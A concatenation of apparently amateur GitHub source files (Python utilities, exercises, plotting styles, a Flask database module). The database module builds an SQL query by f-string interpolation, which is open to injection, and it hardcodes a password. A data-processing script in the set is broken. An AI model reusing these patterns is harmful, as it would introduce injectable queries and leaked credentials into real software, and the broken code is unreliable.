\"{}.\".format(os.path.basename(the_file.file))\n\n conns = list()\n for found_file in os.listdir(os.path.dirname(the_file.file)):\n if found_file.startswith(filename):\n file_reader = self.get_reader(found_file)\n try:\n conns.append(file_reader.read())\n finally:\n file_reader.close()\n return numpy.concatenate(conns)\n\n def __repr__(self):\n return \"FromFileConnector({})\".format(self._file)\n\n def get_reader(self, file): # @ReservedAssignment\n \"\"\" Get a file reader object using the PyNN methods.\n\n :return: A pynn StandardTextFile or similar\n \"\"\"\n return files.StandardTextFile(file, mode=\"r\")\n","repo_name":"apdavison/sPyNNaker8","sub_path":"spynnaker8/models/connectors/from_file_connector.py","file_name":"from_file_connector.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"39969642382","text":"def TestError(d):\n try:\n print('正常结果:',8/d)\n except:\n print('这是异常!!!')\n else:\n print('其他异常!')\n finally:\n print('这是finally')\n\ni=4\nwhile(i>=0):\n TestError(i)\n i-=2\n\n\nwhile True:\n s=input('请输入一个整数:')\n try:\n i=int(s)\n i=8/i\n\n except ValueError:\n print('确认输入的是数字!')\n except ZeroDivisionError:\n print('不能输入0!')\n\n# except(ValueError,ZeroDivisionError) as err:\n# print(err)\n else:\n print('正确!')","repo_name":"hurricaney/PythonStart","sub_path":"PythonApplication1/Data/TryCatch.py","file_name":"TryCatch.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33568642122","text":"\"\"\"\r\nThis problem was asked by Microsoft.\r\nImplement a URL shortener with the following methods:\r\nshorten(url), which shortens the url into a six-character alphanumeric string, such as zLg6wl.\r\nrestore(short), which expands the shortened string into the original url. If no such shortened string exists, return null.\r\nHint: What if we enter the same URL twice?\r\n\"\"\"\r\nimport requests\r\nfrom random import choice\r\n\r\n\r\nclass URLShortener(dict):\r\n\r\n shortened_url_characters = \"aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ1234567890\"\r\n max_urls = 10000000 # Some max, should be based on length of shortened_url_characters\r\n\r\n def __init__(self, prefix, *args, **kwargs):\r\n self.prefix = prefix\r\n\r\n def __call__(self, url):\r\n return self.shorten(url)\r\n\r\n def shorten(self, url):\r\n if len(self) >= self.max_urls:\r\n raise ValueError(\"This URLShortener is full! no more URLs can be shortened based on the allowed characters.\")\r\n if url in self.values():\r\n return next(short for short, previous_url in self.items() if previous_url == url)\r\n shortened_url = \"\"\r\n while not shortened_url or shortened_url in self:\r\n shortened_url = \"\".join(choice(self.shortened_url_characters) for _ in range(6))\r\n self[shortened_url] = url\r\n return shortened_url\r\n\r\n def restore(self, short):\r\n return self.get(short)\r\n\r\n def deactivate(self, short):\r\n return self.pop(short)\r\n\r\n def full_shortened_url(self, short):\r\n return \"{prefix}/{short}\".format(prefix=self.prefix, short=short)\r\n\r\n def redirect(self, short):\r\n try:\r\n return requests.get(self.full_shortened_url(short))\r\n except requests.exceptions.ConnectionError:\r\n pass\r\n\r\n\r\nurl_shortener = URLShortener(\"https://goo.gl.com\")\r\nshort = url_shortener(\"https://www.facebook.com/\")\r\nprint(short)\r\nshort = url_shortener(\"https://www.facebook.com/\")\r\nprint(short)\r\nprint(url_shortener.full_shortened_url(short))\r\nfull = url_shortener.restore(short)\r\nprint(full)\r\nfacebook = url_shortener.redirect(full)\r\nprint(facebook)\r\nurl_shortener.deactivate(short)\r\nprint(short in url_shortener)\r\n","repo_name":"joe-bethke/daily-coding-problems","sub_path":"DCP-55-20190310.py","file_name":"DCP-55-20190310.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21990734259","text":"from tkinter import *\n\nclass BotonGuardar(Frame):\n def __init__(self, master):\n Frame.__init__(self, master)\n\n # Atributos de la clase\n self.configuracion = None\n self.lista_opciones = []\n\n # Configuraciones del frame\n self.config(\n bg=\"#2c2b33\",\n width=370,\n height=50\n )\n\n # Partes del programa\n self.boton = Button(self, text=\"Guardar\", command=self.guardar_configuracion)\n self.separador = Label(self, text=\"\")\n\n # Configuración de estilo del objeto\n self.boton.config(\n fg=\"white\",\n borderwidth=0,\n bg=\"cadetblue\"\n )\n\n self.separador.config(\n bg=\"#2c2b33\"\n )\n\n # posicionamiento de los objetos\n self.boton.place(x=160, y=9)\n \n def enviar_configuracion(self, configuracion):\n self.configuracion = configuracion\n \n # Enviamos los objetos combobox al frame\n def enviar_lista_opciones(self, lista_opciones):\n self.lista_opciones.append(lista_opciones)\n \n def guardar_configuracion(self):\n self.configuracion.modificar_modo_ordenamiento(self.lista_opciones[0].get())\n self.configuracion.modificar_algoritmo(self.lista_opciones[1].get())\n self.configuracion.modificar_criterio(self.lista_opciones[2].get())","repo_name":"LimbersMay/AppOrdenadorFicheros","sub_path":"ventana_config/boton_guardar.py","file_name":"boton_guardar.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39862593830","text":"CFG = {\n \"data_path\": \"../cmfd_forge_train/\",\n \"kwargs\": {\"num_workers\": 4},\n \"batch_size\": 128,\n \"epoch\": 25,\n \"lr\": 1e-3,\n \"momentum\": 0.9,\n \"log_interval\": 10,\n \"l2_decay\": 0,\n \"lambda\": 10,\n \"backbone\": \"alexnet\",\n \"n_class\": 2,\n}\n","repo_name":"AKASH2907/Forgery-Classification-via-Domain-Adaptation","sub_path":"DDC_DeepCoral/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"16045645867","text":"import nltk #for natural language processing \nnltk.download(['punkt', 'wordnet', 'averaged_perceptron_tagger'])\n\nimport re\nimport numpy as np\nimport pandas as pd\n\n#nltk pakages \nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n\n#sklearn pakages\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n engine = create_engine('sqlite:///etl_df.db')\n df =pd.read_sql_table('etl_df',engine)\n X = df['message']\n y= df.iloc[:, 4:]\n print(X.head(5))\npass\n\n\ndef clean_data(df):\n df = pd.merge(messages,categories)\n df.head()\n categories = df[\"categories\"].str.split(\";\", n=36, expand=True)\n categories.head()\n row = categories.iloc[0]\n category_colnames = row.apply(lambda x: x[:-2])\n print(category_colnames)\n categories.columns = category_colnames\n categories.head()\n for column in categories:\n # set each value to be the last character of the string\n categories[column] = categories[column].str[-1]\n \n # convert column from string to numeric\n categories[column] = pd.to_numeric(categories[column])\n categories.head()\n\n df.drop('categories',axis = 1, inplace = True)\n df.head(7)\n frames = [df,categories]\n df = pd.concat(frames, axis=1)\n df.head()\n df[\"is_duplicate\"]= df.duplicated()\n print(df.head())\n df.drop_duplicates(subset='id', inplace=True)\n df[\"is_duplicate\"]= df.duplicated()\n print(df.tail())\n return df\npass;\ndef save_data(df, database_filename):\n from sqlalchemy import create_engine\n engine = create_engine('sqlite:///etl_df.db')\n df.to_sql('etl_df', engine, index=False)\npass\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n if __name__ == '__main__':\n main()\n","repo_name":"sadhukruz/Disaster-response-pipeline","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24646189363","text":"from psycopg2 import pool\nfrom psycopg2.extras import RealDictCursor\nimport logging\n\n# -----\nimport psycopg2\nfrom sqlalchemy import create_engine\nimport csv\n\n\nengine = create_engine('postgresql+psycopg2://postgres:Testing123@dbservice:5432/postgres')\nconn = engine.connect()\ntry:\n conn.execute(\"CREATE database IF NOT EXISTS test1\")\n conn.execute(\"commit\")\nexcept Exception as e:\n print(e)\nfinally:\n conn.close()\n\n# copy csv to postgres\nconn = psycopg2.connect(database=\"test\", user=\"postgres\", password=\"Testing123\", host=\"dbservice\", port=\"5432\")\ncursor = conn.cursor()\n\n# create table\ncursor.execute(\"CREATE TABLE IF NOT EXISTS countries (id serial PRIMARY KEY, country varchar(200), alpha2 char(30), alpha3 char(30), nuCode int, latitude float, longitude float)\")\n# copy data from csv to table\nwith open('countries.csv', newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n cursor.execute(\"INSERT INTO countries (country, alpha2, alpha3, nuCode, latitude, longitude) VALUES (%s, %s, %s, %s, %s, %s)\", (row['Country'], row['Alpha2_code'], row['Alpha3_code'], row['Numeric_code'], row['Latitude'], row['Longitude']))\nconn.commit()\nconn.close()\n# ---\n\ntry: \n connection_pool = pool.SimpleConnectionPool(1, 5, host=\"dbservice\", port=5432,\n database=\"test\",\n user=\"postgres\",\n password=\"Testing123\")\nexcept Exception as e:\n connection_pool = None\n logging.info(str(e))\n\"\"\"\nQueries \n\"SELECT * from countries limit 10;\"\n\n\"SELECT * from countries WHERE id = {id}\n\"\"\"\n\ndef get_top_10():\n if connection_pool != None:\n conn = connection_pool.getconn()\n values = None\n with conn.cursor(cursor_factory=RealDictCursor) as cursor:\n cursor.execute(\"SELECT * from countries limit 10;\")\n values = cursor.fetchall()\n connection_pool.putconn(conn)\n return values\n return {\"error\":\"conneting to db\"}\n\ndef get_one_country(id_):\n if connection_pool != None:\n conn = connection_pool.getconn()\n values = None\n with conn.cursor(cursor_factory=RealDictCursor) as cursor:\n values = cursor.execute(f\"SELECT * from countries WHERE id = {id_}\")\n values = cursor.fetchall()\n connection_pool.putconn(conn)\n return values\n return {\"error\":\"conneting to db\"}","repo_name":"curiouscat22/flask-ex","sub_path":"api/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31631618846","text":"import ROOT\n\n#############################################\n# ROOT styles (High tau pT analysis) #\n# Author : Alexei Raspereza (December 2022) #\n#############################################\n\neraLumiLabel = {\n \"UL2016\" : \"2016, 36.3 fb^{-1} (13TeV)\",\n \"UL2016_postVFP\" : \"2016 postVFP, 16.8 fb^{-1} (13 TeV)\",\n \"UL2016_preVFP\" : \"2016 preVFP, 19.5 fb^{-1} (13TeV)\",\n \"UL2017\" : \"2017, 41.5 fb^{-1} (13TeV)\",\n \"UL2018\" : \"2018, 59.8 fb^{-1} (13TeV)\"\n}\n\ndef InitROOT():\n\n ROOT.TH1.SetDefaultSumw2(True)\n ROOT.TH2.SetDefaultSumw2(True)\n ROOT.gROOT.SetBatch(True)\n\n\ndef SetStyle():\n\n HttStyle = ROOT.TStyle(\"HttStyle\",\"High pT analysis : ROOT Styles -)\")\n ROOT.gStyle = HttStyle\n HttStyle.SetOptStat(0000)\n HttStyle.SetOptFit(0000) \n\n # Canvas\n HttStyle.SetCanvasColor (0)\n HttStyle.SetCanvasBorderSize(10)\n HttStyle.SetCanvasBorderMode(0)\n HttStyle.SetCanvasDefH (700)\n HttStyle.SetCanvasDefW (700)\n HttStyle.SetCanvasDefX (100)\n HttStyle.SetCanvasDefY (100)\n\n # pads\n HttStyle.SetPadColor (0)\n HttStyle.SetPadBorderSize (10)\n HttStyle.SetPadBorderMode (0)\n HttStyle.SetPadBottomMargin(0.15)\n HttStyle.SetPadTopMargin (0.08)\n HttStyle.SetPadLeftMargin (0.18)\n HttStyle.SetPadRightMargin (0.05)\n HttStyle.SetPadGridX (0)\n HttStyle.SetPadGridY (0)\n HttStyle.SetPadTickX (1)\n HttStyle.SetPadTickY (1)\n\n # Frames\n HttStyle.SetLineWidth(3)\n HttStyle.SetFrameFillStyle ( 0)\n HttStyle.SetFrameFillColor ( 0)\n HttStyle.SetFrameLineColor ( 1)\n HttStyle.SetFrameLineStyle ( 0)\n HttStyle.SetFrameLineWidth ( 2)\n HttStyle.SetFrameBorderSize(10)\n HttStyle.SetFrameBorderMode( 0)\n\n # Histograms\n HttStyle.SetHistFillColor(2)\n HttStyle.SetHistFillStyle(0)\n HttStyle.SetHistLineColor(1)\n HttStyle.SetHistLineStyle(0)\n HttStyle.SetHistLineWidth(3)\n HttStyle.SetNdivisions(505)\n\n # Functions\n HttStyle.SetFuncColor(1)\n HttStyle.SetFuncStyle(0)\n HttStyle.SetFuncWidth(2)\n\n # Various\n HttStyle.SetMarkerStyle(20)\n HttStyle.SetMarkerColor(ROOT.kBlack)\n HttStyle.SetMarkerSize (1.4)\n\n HttStyle.SetTitleBorderSize(0)\n HttStyle.SetTitleFillColor (0)\n HttStyle.SetTitleX (0.2)\n\n HttStyle.SetTitleSize (0.055,\"X\")\n HttStyle.SetTitleOffset(1.200,\"X\")\n HttStyle.SetLabelOffset(0.005,\"X\")\n HttStyle.SetLabelSize (0.050,\"X\")\n HttStyle.SetLabelFont (42 ,\"X\")\n\n HttStyle.SetStripDecimals(False)\n HttStyle.SetLineStyleString(11,\"20 10\")\n\n HttStyle.SetTitleSize (0.055,\"Y\")\n HttStyle.SetTitleOffset(1.600,\"Y\")\n HttStyle.SetLabelOffset(0.010,\"Y\")\n HttStyle.SetLabelSize (0.050,\"Y\")\n HttStyle.SetLabelFont (42 ,\"Y\")\n\n HttStyle.SetTextSize (0.055)\n HttStyle.SetTextFont (42)\n\n HttStyle.SetStatFont (42)\n HttStyle.SetTitleFont (42)\n HttStyle.SetTitleFont (42,\"X\")\n HttStyle.SetTitleFont (42,\"Y\")\n\n HttStyle.SetOptStat (0)\n\n ROOT.gStyle = HttStyle\n\ndef MakeCanvas(name,title,dX,dY):\n\n # Create canvas\n canvas = ROOT.TCanvas(name,title,dX,dY)\n canvas.SetFillColor (0)\n canvas.SetBorderMode (0)\n canvas.SetBorderSize (10)\n\n # Set margins to reasonable defaults\n canvas.SetLeftMargin (0.18)\n canvas.SetRightMargin (0.05)\n canvas.SetTopMargin (0.08)\n canvas.SetBottomMargin (0.15)\n\n # Setup a frame which makes sense\n canvas.SetFrameFillStyle (0)\n canvas.SetFrameLineStyle (0)\n canvas.SetFrameBorderMode(0)\n canvas.SetFrameBorderSize(10)\n canvas.SetFrameFillStyle (0)\n canvas.SetFrameLineStyle (0)\n canvas.SetFrameBorderMode(0)\n canvas.SetFrameBorderSize(10)\n \n return canvas\n\ndef InitModel(hist,color):\n hist.SetFillStyle(0)\n hist.SetLineStyle(1)\n hist.SetLineWidth(2)\n hist.SetLineColor(color)\n hist.SetMarkerStyle(0)\n hist.SetMarkerSize(0)\n hist.SetMarkerColor(0)\n \n\ndef InitHist(hist, xtit, ytit, color, style):\n hist.SetXTitle(xtit)\n hist.SetYTitle(ytit)\n hist.SetLineColor(ROOT.kBlack)\n hist.SetLineWidth( 2)\n hist.SetFillColor(color )\n hist.SetFillStyle(style )\n hist.SetTitleSize (0.055,\"Y\")\n hist.SetTitleOffset(1.200,\"Y\")\n hist.SetLabelOffset(0.014,\"Y\")\n hist.SetLabelSize (0.040,\"Y\")\n hist.SetLabelFont (42 ,\"Y\")\n hist.SetTitleSize (0.055,\"X\")\n hist.SetTitleOffset(1.300,\"X\")\n hist.SetLabelOffset(0.014,\"X\")\n hist.SetLabelSize (0.050,\"X\")\n hist.SetLabelFont (42 ,\"X\")\n hist.SetMarkerStyle(20)\n hist.SetMarkerColor(color)\n hist.SetMarkerSize (0.6)\n hist.GetYaxis().SetTitleFont(42)\n hist.GetXaxis().SetTitleFont(42)\n hist.SetTitle(\"\") \n\ndef InitTotalHist(hist):\n hist.SetFillStyle(3013);\n hist.SetFillColor(1);\n hist.SetMarkerStyle(21);\n hist.SetMarkerSize(0);\n\ndef InitData(hist):\n hist.SetMarkerStyle(20)\n hist.SetMarkerSize(1.3)\n hist.SetLineWidth(2)\n\ndef InitRatioHist(hist):\n hist.GetXaxis().SetLabelOffset(0.04)\n hist.GetXaxis().SetLabelSize(0.14)\n hist.GetXaxis().SetTitleSize(0.13)\n hist.GetXaxis().SetTitleOffset(1.2)\n hist.GetYaxis().SetLabelFont(42)\n hist.GetYaxis().SetLabelOffset(0.015)\n hist.GetYaxis().SetLabelSize(0.13)\n hist.GetYaxis().SetTitleSize(0.14)\n hist.GetYaxis().SetTitleOffset(0.5)\n hist.GetXaxis().SetTickLength(0.07)\n hist.GetYaxis().SetTickLength(0.04)\n hist.GetYaxis().SetLabelOffset(0.01)\n hist.GetYaxis().SetNdivisions(505)\n\ndef SetLegendStyle(leg): \n leg.SetFillStyle (0)\n leg.SetFillColor (0)\n leg.SetBorderSize(0)\n\ndef InitUpperPad(pad):\n pad.SetFillColor(0)\n pad.SetBorderMode(0)\n pad.SetBorderSize(10)\n pad.SetTickx(1)\n pad.SetTicky(1)\n pad.SetLeftMargin(0.17)\n pad.SetRightMargin(0.05)\n pad.SetBottomMargin(0.02)\n pad.SetFrameFillStyle(0)\n pad.SetFrameLineStyle(0)\n pad.SetFrameLineWidth(2)\n pad.SetFrameBorderMode(0)\n pad.SetFrameBorderSize(10)\n pad.SetFrameFillStyle(0)\n pad.SetFrameLineStyle(0)\n pad.SetFrameLineWidth(2)\n pad.SetFrameBorderMode(0)\n pad.SetFrameBorderSize(10)\n\ndef InitLowerPad(pad):\n pad.SetFillColor(0)\n pad.SetBorderMode(0)\n pad.SetBorderSize(10)\n pad.SetGridy()\n pad.SetTickx(1)\n pad.SetTicky(1)\n pad.SetLeftMargin(0.17)\n pad.SetRightMargin(0.05)\n pad.SetTopMargin(0.026)\n pad.SetBottomMargin(0.35)\n pad.SetFrameFillStyle(0)\n pad.SetFrameLineStyle(0)\n pad.SetFrameLineWidth(2)\n pad.SetFrameBorderMode(0)\n pad.SetFrameBorderSize(10)\n pad.SetFrameFillStyle(0)\n pad.SetFrameLineStyle(0)\n pad.SetFrameLineWidth(2)\n pad.SetFrameBorderMode(0)\n pad.SetFrameBorderSize(10)\n\ndef CMS_label(pad,**kwargs):\n\n iPeriod = kwargs.get('Period',4)\n iPosX = kwargs.get('PosX',33)\n writeExtraText = kwargs.get('writeExtraText',True)\n era = kwargs.get('era',\"UL2018\")\n extraText = kwargs.get('extraText',\"Internal\")\n\n lumiText = eraLumiLabel[era]\n\n extraTextFont = 52 #\n\n cmsText = \"CMS\"\n cmsTextFont = 61 # default is helvetic-bold\n\n # text sizes and text offsets with respect to the top frame\n # in unit of the top margin size\n lumiTextSize = 0.6\n lumiTextOffset = 0.2\n cmsTextSize = 0.75\n cmsTextOffset = 0.1 # only used in outOfFrame version\n \n relPosX = 0.045\n relPosY = 0.035\n relExtraDY = 1.2\n\n # ratio of \"CMS\" and extra text size\n extraOverCmsTextSize = 0.76\n\n outOfFrame = False\n alignY_=3\n alignX_=2\n if iPosX/10==0: \n alignX_=1\n if iPosX==0:\n alignX_=1\n if iPosX/10==1: \n alignX_=1\n if iPosX/10==2: \n alignX_=2\n if iPosX/10==3: \n alignX_=3\n if iPosX == 0: \n relPosX = 0.12\n \n align_ = 10*alignX_ + alignY_\n\n H = pad.GetWh()\n W = pad.GetWw()\n l = pad.GetLeftMargin()\n t = pad.GetTopMargin()\n r = pad.GetRightMargin()\n b = pad.GetBottomMargin()\n\n pad.cd()\n\n latex = ROOT.TLatex()\n latex.SetNDC()\n latex.SetTextAngle(0)\n latex.SetTextColor(ROOT.kBlack) \n\n extraTextSize = extraOverCmsTextSize*cmsTextSize\n\n latex.SetTextFont(42)\n latex.SetTextAlign(31) \n latex.SetTextSize(lumiTextSize*t) \n latex.DrawLatex(1-r,1-t+lumiTextOffset*t,lumiText)\n \n if outOfFrame:\n latex.SetTextFont(cmsTextFont)\n latex.SetTextAlign(11) \n latex.SetTextSize(cmsTextSize*t) \n latex.DrawLatex(l,1-t+lumiTextOffset*t,cmsText)\n \n pad.cd()\n\n posX_=0.\n if iPosX%10<=1:\n posX_ = l + relPosX*(1-l-r)\n if iPosX%10==2:\n posX_ = l + 0.5*(1-l-r)\n if iPosX%10==3:\n posX_ = 1-r - relPosX*(1-l-r)\n\n posY_ = 1-t - relPosY*(1-t-b)\n\n if not outOfFrame:\n latex.SetTextFont(cmsTextFont)\n latex.SetTextSize(cmsTextSize*t)\n latex.SetTextAlign(align_)\n latex.DrawLatex(posX_, posY_, cmsText)\n if writeExtraText:\n latex.SetTextFont(extraTextFont)\n latex.SetTextAlign(align_)\n latex.SetTextSize(extraTextSize*t)\n latex.DrawLatex(posX_, posY_- relExtraDY*cmsTextSize*t + 0.01, extraText)\n elif writeExtraText:\n if iPosX==0: \n posX_ = l + relPosX*(1-l-r)\n posY_ = 1-t+lumiTextOffset*t\n latex.SetTextFont(extraTextFont)\n latex.SetTextSize(extraTextSize*t)\n latex.SetTextAlign(align_)\n latex.DrawLatex(posX_, posY_+0.7, extraText) \n","repo_name":"cms-tau-pog/TauFW","sub_path":"Fitter/python/HighPT/stylesHighPT.py","file_name":"stylesHighPT.py","file_ext":"py","file_size_in_byte":9454,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"10672392389","text":"from dougsheets import plugin\n\n\nclass LessThan(plugin.Plugin):\n def removeLessThan(self, col, number):\n newSheetObject = []\n sheetObject = self.gui.sheetObject\n\n for row in sheetObject:\n if type(row[col]) == str:\n newSheetObject.append(row)\n else:\n if int(row[col]) >= number:\n newSheetObject.append(row)\n\n self.gui.sheetObject = newSheetObject\n self.gui.update_sheet()\n\n def LessThanAction(self, e):\n number = self.getInput__Variable('num', \"Less-Than Filter\", \"Under what number should we filter out?\", e)\n column = self.getInput__Column('col', \"Less-Than Filter\", \"What column should we filter from?\", e)\n\n if number and column:\n number = int(number)\n self.removeLessThan(column, number)\n\n def init(self):\n self.createMenuItem(\n self.gui.menu_filter,\n \"Less Than\",\n self.LessThanAction,\n cli_help=\"Usage: 'less_than col=[COLUMN LETTER/NUMBER] num=[NUMBER]'\"\n )\n\nsettings = {\n \"class\": LessThan,\n 'name': \"Less-Than Filter\",\n}\n\n","repo_name":"DougBeney/DevSheets-Plugins","sub_path":"less_than_filter.py","file_name":"less_than_filter.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33587714305","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport codecs\nimport os\n\nfrom setuptools import setup, find_packages\n\n\nPACKAGE = \"xvistaprof\"\nNAME = \"xvistaprof\"\nDESCRIPTION = \"Astropy reader for XVISTA profile tables\"\nAUTHOR = \"Jonathan Sick\"\nAUTHOR_EMAIL = \"jonathansick@mac.com\"\nURL = \"https://github.com/jonathansick/xvistaprof/\"\nVERSION = __import__(PACKAGE).__version__\n\n\ndef read(fname):\n return codecs.open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n long_description=read(\"README.rst\"),\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n license=\"BSD\",\n url=URL,\n packages=find_packages(exclude=[\"tests.*\", \"tests\"]),\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n ],\n zip_safe=False,\n)\n","repo_name":"jonathansick/xvistaprof","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28912206563","text":"from typing import Optional\nfrom list_node import ListNode\n\n\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n prev = None\n cur = head\n\n while cur is not None:\n next_node = cur.next\n cur.next = prev\n prev = cur\n cur = next_node\n\n return prev\n\n","repo_name":"ysakiyev/31github","sub_path":"neetcode_150/linked_lists/206_reverse_linked_list.py","file_name":"206_reverse_linked_list.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37577320646","text":"from pathlib import Path\nimport sys, os, venv, argparse, subprocess\n\nNO_VIRTUAL_ENV = os.getenv(\"NO_VIRTUAL_ENV\")\n\nclass Env():\n def __init__(self, python):\n self._python = python\n\n @classmethod\n def get(cls):\n return cls(sys.executable)\n\n @staticmethod\n def run(*args, **kwargs):\n print(\" \".join(args))\n completed_process = subprocess.run(args, **kwargs)\n completed_process.check_returncode()\n return completed_process\n\n def python(self, *args, **kwargs):\n return self.run(self._python, *args, **kwargs)\n\n def pip(self, *args, **kwargs):\n return self.python(\"-m\", \"pip\", \"--isolated\", \"--disable-pip-version-check\", *args, **kwargs)\n\n def setup_py(self, *args, **kwargs):\n return self.python(\"setup.py\", *args, **kwargs)\n\n\nclass VirtualEnv(Env):\n @classmethod\n def get(cls):\n return cls(sys.executable) if cls.is_venv_active() else None\n\n @classmethod\n def make(cls, venv_dir=\"venv\"):\n if cls.is_venv_active():\n print(\"Virtual Environment already active at:\")\n print(sys.prefix, end=\"\\n\\n\")\n env = VirtualEnv(sys.executable)\n else:\n venv_path = Path(venv_dir).resolve()\n # For Python <3.10, resolve won't return an absolute path if the\n # file/directory does not exist on Windows\n # https://bugs.python.org/issue38671\n if not venv_path.is_absolute():\n venv_path = Path().resolve() / venv_path\n print(\"Creating new Virtual Environment at:\")\n print(venv_path, end=\"\\n\\n\")\n # https://github.com/python/cpython/blob/38f331d4656394ae0f425568e26790ace778e076/Lib/venv/__init__.py#L476-L479\n if os.name == 'nt':\n use_symlinks = False\n else:\n use_symlinks = True\n builder = venv.EnvBuilder(system_site_packages=False,\n clear=False,\n symlinks=use_symlinks,\n upgrade=False,\n with_pip=True,\n prompt=None,\n upgrade_deps=False\n )\n context = builder.ensure_directories(venv_path)\n builder.create(venv_path)\n env = VirtualEnv(context.env_exec_cmd)\n\n return env\n\n @classmethod\n def is_venv_active(self):\n return sys.prefix != sys.base_prefix\n\ndef use_virtual_env():\n return not NO_VIRTUAL_ENV\n\nclass DecoratedArgParse():\n def __init__(self, *args, **kwargs):\n self.arg_parser = argparse.ArgumentParser(*args, **kwargs)\n self.arg_parser.error = self.error #Provide our own error function\n self._subparsers = None\n\n @property\n def subparsers(self):\n if self._subparsers is None:\n self._subparsers = self.arg_parser.add_subparsers(\n title=\"Available Commands\",\n required=True,\n metavar=\"\"\n )\n return self._subparsers\n\n def make_subparsers(self, *args, **kwargs):\n self._subparsers = self.arg_parser.add_subparsers(*args, **kwargs)\n\n def parse_args(self, args=None):\n return self.arg_parser.parse_args(args)\n\n def parser(self, *args, **kwargs):\n def decorator(f):\n parser_args, parser_kwargs = self.check_params((args, kwargs))\n parser = self.subparsers.add_parser(f.__name__.lower().replace(\"_\", \"-\"), *parser_args, **parser_kwargs)\n if hasattr(f, \"__argparse_params__\"):\n for params in f.__argparse_params__:\n parser_args, parser_kwargs = params\n parser.add_argument(*parser_args, **parser_kwargs)\n del f.__argparse_params__\n parser.set_defaults(func=f)\n return f\n return decorator\n\n def argument(self, *args, **kwargs):\n def decorator(f):\n params = (args, kwargs)\n if not hasattr(f, \"__argparse_params__\"):\n f.__argparse_params__ = []\n f.__argparse_params__.append(params)\n return f\n return decorator\n\n @staticmethod\n def check_params(params):\n args, kwargs = params\n help_desc = kwargs.pop(\"help_desc\", None)\n if help_desc is not None:\n kwargs[\"help\"] = help_desc\n kwargs[\"description\"] = help_desc\n return (args, kwargs)\n\n def error(self, message):\n \"\"\"error(message: string)\n Prints a usage message incorporating the message to stderr,\n followed by the help message, and then exits.\n If you override this in a subclass, it should not return -- it\n should either exit or raise an exception.\n \"\"\"\n sys.stderr.write(f\"error: {message}\\n\")\n self.arg_parser.print_help(sys.stderr)\n sys.exit(2)\n\ndef monopoly_probabilities_dir():\n return Path(__file__).parents[2].resolve()\n","repo_name":"dunkmann00/Monopoly-Probabilities","sub_path":"scripts/scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33731387122","text":"BLACK = '\\033[30m'\nOKBLUE = '\\033[94m'\nOKGREEN = '\\033[92m'\nRED = '\\033[31m'\nBLUE = '\\033[34m'\nFAIL = '\\033[91m'\nENDC = '\\033[0m'\nBOLD = '\\033[1m'\nITALIC = '\\033[3m'\nSTRIKE = '\\033[29m'\nUNDERLINE = '\\033[4m'\n\n# --------------------------\n_VERSION = \"DEV_1.7\"\n_AUTHOR = \"Mondei1\"\n# --------------------------\n\n# scan.py will set this value to TRUE when it start's the scan\ninScan = False\n\n# If phase 1 is skipped with CTRL+C\nskipped = 